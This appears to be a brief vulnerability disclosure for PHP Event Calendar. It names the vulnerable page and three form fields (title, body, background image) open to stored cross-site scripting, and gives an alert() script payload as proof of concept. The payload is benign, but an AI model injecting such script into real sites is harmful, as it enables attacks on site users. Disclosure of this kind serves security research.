http://www.example.com/directory_where_you_installed_php_event_calendar/cl_files/index.php
Vulnerable fields: title field  - ti
           body field - bi
           Backgroung Image - cbgi

Insert "<script>alert('XSS Vulnerable');</script>" in above field and 
click "Add event".